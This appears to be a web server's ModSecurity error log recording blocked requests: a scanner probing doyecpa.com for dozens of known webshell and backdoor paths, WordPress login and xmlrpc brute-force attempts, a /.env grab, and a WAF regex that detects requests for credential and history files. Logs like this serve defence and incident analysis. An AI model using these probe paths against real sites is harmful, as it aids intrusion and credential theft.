[Tue May 26 13:50:17.398368 2026] [security2:error] [pid 560287:tid 560495] [client 15.235.169.50:58698] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/log.php"] [unique_id "ahVXwZmX5s6sDS3wJVcSVAAAAM4"]
[Tue May 26 13:50:17.868163 2026] [security2:error] [pid 560287:tid 560540] [client 15.235.169.50:58763] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-pano.php"] [unique_id "ahVXwZmX5s6sDS3wJVcSWwAAAPg"]
[Tue May 26 13:50:18.347253 2026] [security2:error] [pid 555743:tid 555981] [client 15.235.169.50:58828] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/include.php"] [unique_id "ahVXwsjqAquC0YaxQjC0CAAAAXY"]
[Tue May 26 13:50:18.524424 2026] [security2:error] [pid 560287:tid 560545] [client 113.176.226.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVXwZmX5s6sDS3wJVcSTAAAAP0"]
[Tue May 26 13:50:18.556580 2026] [security2:error] [pid 560287:tid 560532] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXwpmX5s6sDS3wJVcSXgAAAPI"]
[Tue May 26 13:50:18.815608 2026] [security2:error] [pid 555743:tid 555893] [client 15.235.169.50:58906] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/class.engine.php"] [unique_id "ahVXwsjqAquC0YaxQjC0DQAAAR4"]
[Tue May 26 13:50:19.293071 2026] [security2:error] [pid 555743:tid 555997] [client 15.235.169.50:58974] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/js/be.php"] [unique_id "ahVXw8jqAquC0YaxQjC0FgAAAYY"]
[Tue May 26 13:50:19.605217 2026] [security2:error] [pid 560287:tid 560542] [client 129.222.147.134:45155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXw5mX5s6sDS3wJVcSdQAAAPo"]
[Tue May 26 13:50:19.609815 2026] [security2:error] [pid 560287:tid 560542] [client 129.222.147.134:45155] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXw5mX5s6sDS3wJVcSdQAAAPo"]
[Tue May 26 13:50:19.726028 2026] [security2:error] [pid 560287:tid 560494] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXw5mX5s6sDS3wJVcScAAAAM0"]
[Tue May 26 13:50:19.789889 2026] [security2:error] [pid 555743:tid 555998] [client 15.235.169.50:59090] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/shapes.php"] [unique_id "ahVXw8jqAquC0YaxQjC0GgAAAYc"]
[Tue May 26 13:50:20.267217 2026] [security2:error] [pid 555743:tid 555988] [client 15.235.169.50:59155] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/amaxx.php"] [unique_id "ahVXxMjqAquC0YaxQjC0JAAAAX0"]
[Tue May 26 13:50:20.750389 2026] [security2:error] [pid 560287:tid 560443] [client 15.235.169.50:59267] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/makeasmtp.php"] [unique_id "ahVXxJmX5s6sDS3wJVcSgwAAAJ0"]
[Tue May 26 13:50:21.254663 2026] [security2:error] [pid 560287:tid 560455] [client 15.235.169.50:59334] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/bak.php"] [unique_id "ahVXxZmX5s6sDS3wJVcSiQAAAKg"]
[Tue May 26 13:50:21.729220 2026] [security2:error] [pid 560287:tid 560512] [client 15.235.169.50:59413] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/ms-controller.php"] [unique_id "ahVXxZmX5s6sDS3wJVcSlAAAAN4"]
[Tue May 26 13:50:22.185930 2026] [security2:error] [pid 560287:tid 560469] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXxZmX5s6sDS3wJVcSmAAAALU"]
[Tue May 26 13:50:22.220069 2026] [security2:error] [pid 560287:tid 560484] [client 15.235.169.50:59483] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-conflg.php"] [unique_id "ahVXxpmX5s6sDS3wJVcSoQAAAMM"]
[Tue May 26 13:50:22.641081 2026] [security2:error] [pid 560287:tid 560531] [client 176.65.139.235:33758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.drunktales.moes-art.com"] [uri "/.env"] [unique_id "ahVXxpmX5s6sDS3wJVcSrQAAAPE"]
[Tue May 26 13:50:22.692713 2026] [security2:error] [pid 560287:tid 560505] [client 15.235.169.50:59574] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/class-wp-smtp-bar.php"] [unique_id "ahVXxpmX5s6sDS3wJVcSrgAAANc"]
[Tue May 26 13:50:22.939160 2026] [security2:error] [pid 560287:tid 560401] [remote 91.227.122.219:35970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVXxpmX5s6sDS3wJVcSsAAAs3A"]
[Tue May 26 13:50:23.170389 2026] [security2:error] [pid 560287:tid 560448] [client 15.235.169.50:59655] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-atom.php"] [unique_id "ahVXx5mX5s6sDS3wJVcSuwAAAKI"]
[Tue May 26 13:50:23.215176 2026] [security2:error] [pid 560287:tid 560450] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXxpmX5s6sDS3wJVcStAAAAKQ"]
[Tue May 26 13:50:23.403009 2026] [security2:error] [pid 560287:tid 560428] [client 114.119.142.15:60579] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.chettinadavenue.com"] [uri "/blog-single.html"] [unique_id "ahVXx5mX5s6sDS3wJVcSwAAAAI8"], referer: https://www.chettinadavenue.com/
[Tue May 26 13:50:23.645221 2026] [security2:error] [pid 555743:tid 555943] [client 15.235.169.50:59731] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/themes.php"] [unique_id "ahVXx8jqAquC0YaxQjC0RgAAAVA"]
[Tue May 26 13:50:24.135314 2026] [security2:error] [pid 555743:tid 555893] [client 15.235.169.50:59803] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/root-file-manager/wp-file.php"] [unique_id "ahVXyMjqAquC0YaxQjC0SQAAAR4"]
[Tue May 26 13:50:24.606327 2026] [security2:error] [pid 555743:tid 555894] [client 15.235.169.50:59883] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/dummyyummy/wp-signup.php"] [unique_id "ahVXyMjqAquC0YaxQjC0TgAAAR8"]
[Tue May 26 13:50:25.089178 2026] [security2:error] [pid 555743:tid 555900] [client 15.235.169.50:59947] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/offline.php"] [unique_id "ahVXycjqAquC0YaxQjC0WwAAASU"]
[Tue May 26 13:50:25.121668 2026] [security2:error] [pid 560287:tid 560535] [client 14.191.199.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXyJmX5s6sDS3wJVcSzAAAAPU"]
[Tue May 26 13:50:25.577807 2026] [security2:error] [pid 560287:tid 560480] [client 15.235.169.50:60004] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/ph-file-manager/wp-file.php"] [unique_id "ahVXyZmX5s6sDS3wJVcS4AAAAL8"]
[Tue May 26 13:50:25.983215 2026] [security2:error] [pid 560287:tid 560531] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXyZmX5s6sDS3wJVcS3wAAAPE"]
[Tue May 26 13:50:26.047505 2026] [security2:error] [pid 560287:tid 560539] [client 15.235.169.50:60079] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/item.php"] [unique_id "ahVXypmX5s6sDS3wJVcS9AAAAPc"]
[Tue May 26 13:50:26.279447 2026] [security2:error] [pid 560287:tid 560394] [remote 47.128.46.60:21228] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/category/blogs/"] [unique_id "ahVXypmX5s6sDS3wJVcS_AAA2mk"]
[Tue May 26 13:50:26.531498 2026] [security2:error] [pid 555743:tid 555922] [client 15.235.169.50:60173] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/class-response.php"] [unique_id "ahVXysjqAquC0YaxQjC0cAAAATs"]
[Tue May 26 13:50:26.808442 2026] [security2:error] [pid 560287:tid 560499] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXypmX5s6sDS3wJVcTAQAAANI"]
[Tue May 26 13:50:27.025774 2026] [security2:error] [pid 555743:tid 555906] [client 15.235.169.50:60270] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/doc.php"] [unique_id "ahVXy8jqAquC0YaxQjC0eAAAASs"]
[Tue May 26 13:50:27.502922 2026] [security2:error] [pid 560287:tid 560421] [client 15.235.169.50:60332] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/css/load.php"] [unique_id "ahVXy5mX5s6sDS3wJVcTDQAAAIg"]
[Tue May 26 13:50:28.006235 2026] [security2:error] [pid 555743:tid 555908] [client 15.235.169.50:60390] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/rmdir.php"] [unique_id "ahVXzMjqAquC0YaxQjC0ggAAAS0"]
[Tue May 26 13:50:28.485512 2026] [security2:error] [pid 560287:tid 560518] [client 15.235.169.50:60460] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/upgrade/wp-casper.php"] [unique_id "ahVXzJmX5s6sDS3wJVcTIgAAAOQ"]
[Tue May 26 13:50:28.546463 2026] [security2:error] [pid 560287:tid 560425] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXzJmX5s6sDS3wJVcTIAAAAIw"]
[Tue May 26 13:50:28.959612 2026] [security2:error] [pid 560287:tid 560511] [client 15.235.169.50:60536] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/"] [unique_id "ahVXzJmX5s6sDS3wJVcTJQAAAN0"]
[Tue May 26 13:50:29.439592 2026] [security2:error] [pid 555743:tid 555883] [client 15.235.169.50:60603] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/uclnvbmt.php"] [unique_id "ahVXzcjqAquC0YaxQjC0lAAAARQ"]
[Tue May 26 13:50:29.752090 2026] [security2:error] [pid 555743:tid 555897] [client 129.222.147.134:62485] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXzcjqAquC0YaxQjC0mwAAASI"]
[Tue May 26 13:50:29.760049 2026] [security2:error] [pid 555743:tid 555897] [client 129.222.147.134:62485] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXzcjqAquC0YaxQjC0mwAAASI"]
[Tue May 26 13:50:29.915250 2026] [security2:error] [pid 555743:tid 555899] [client 15.235.169.50:60675] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-login.php"] [unique_id "ahVXzcjqAquC0YaxQjC0owAAASQ"]
[Tue May 26 13:50:30.172732 2026] [security2:error] [pid 555743:tid 555997] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXzcjqAquC0YaxQjC0ngAAAYY"]
[Tue May 26 13:50:30.386227 2026] [security2:error] [pid 555743:tid 555964] [client 15.235.169.50:60744] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/class.api.php"] [unique_id "ahVXzsjqAquC0YaxQjC0rwAAAWU"]
[Tue May 26 13:50:30.861798 2026] [security2:error] [pid 555743:tid 555913] [client 15.235.169.50:60795] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/uploads/b374k.php.suspected"] [unique_id "ahVXzsjqAquC0YaxQjC0uwAAATI"]
[Tue May 26 13:50:31.351785 2026] [security2:error] [pid 560287:tid 560499] [client 15.235.169.50:60848] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/shell.php"] [unique_id "ahVXz5mX5s6sDS3wJVcTOwAAANI"]
[Tue May 26 13:50:31.837328 2026] [security2:error] [pid 560287:tid 560506] [client 15.235.169.50:60898] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/themes.php"] [unique_id "ahVXz5mX5s6sDS3wJVcTQQAAANg"]
[Tue May 26 13:50:32.302573 2026] [security2:error] [pid 555743:tid 555932] [client 15.235.169.50:60979] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/tinymce/wp-login.php"] [unique_id "ahVX0MjqAquC0YaxQjC0zAAAAUU"]
[Tue May 26 13:50:32.768885 2026] [security2:error] [pid 555743:tid 555894] [client 15.235.169.50:61030] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/tool.php"] [unique_id "ahVX0MjqAquC0YaxQjC00QAAAR8"]
[Tue May 26 13:50:32.834445 2026] [security2:error] [pid 560287:tid 560444] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX0JmX5s6sDS3wJVcTRgAAAJ4"]
[Tue May 26 13:50:33.236468 2026] [security2:error] [pid 560287:tid 560437] [client 15.235.169.50:61088] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/alfamodif.php"] [unique_id "ahVX0ZmX5s6sDS3wJVcTUwAAAJg"]
[Tue May 26 13:50:33.721097 2026] [security2:error] [pid 560287:tid 560412] [remote 45.250.255.226:50934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVX0ZmX5s6sDS3wJVcTVAAA6Hs"]
[Tue May 26 13:50:33.731449 2026] [security2:error] [pid 555743:tid 555919] [client 15.235.169.50:61200] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/wp-cogguk.php"] [unique_id "ahVX0cjqAquC0YaxQjC02wAAATg"]
[Tue May 26 13:50:34.216151 2026] [security2:error] [pid 560287:tid 560539] [client 15.235.169.50:61274] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/feed-atom-comments-meta.php"] [unique_id "ahVX0pmX5s6sDS3wJVcTagAAAPc"]
[Tue May 26 13:50:34.517239 2026] [security2:error] [pid 560287:tid 560475] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX0pmX5s6sDS3wJVcTYwAAALs"]
[Tue May 26 13:50:34.688203 2026] [security2:error] [pid 560287:tid 560476] [client 15.235.169.50:61357] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/languages/confno7.php"] [unique_id "ahVX0pmX5s6sDS3wJVcTdgAAALw"]
[Tue May 26 13:50:34.886657 2026] [security2:error] [pid 560287:tid 560542] [client 106.192.248.115:65077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVX0pmX5s6sDS3wJVcTeQAAAPo"]
[Tue May 26 13:50:34.886761 2026] [security2:error] [pid 560287:tid 560542] [client 106.192.248.115:65077] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVX0pmX5s6sDS3wJVcTeQAAAPo"]
[Tue May 26 13:50:35.150000 2026] [security2:error] [pid 560287:tid 560420] [client 15.235.169.50:61430] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/ID3/getid3s.php"] [unique_id "ahVX05mX5s6sDS3wJVcThQAAAIc"]
[Tue May 26 13:50:35.632862 2026] [security2:error] [pid 560287:tid 560509] [client 15.235.169.50:61496] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/uploads/20230303064717.php"] [unique_id "ahVX05mX5s6sDS3wJVcTmQAAANs"]
[Tue May 26 13:50:36.063927 2026] [autoindex:error] [pid 555743:tid 555947] [client 198.235.24.176:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://juniorwoodies.com/
[Tue May 26 13:50:36.100248 2026] [security2:error] [pid 560287:tid 560526] [client 15.235.169.50:61564] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/tinymce/radio.php"] [unique_id "ahVX1JmX5s6sDS3wJVcTpgAAAOw"]
[Tue May 26 13:50:36.299273 2026] [security2:error] [pid 560287:tid 560531] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX05mX5s6sDS3wJVcToQAAAPE"]
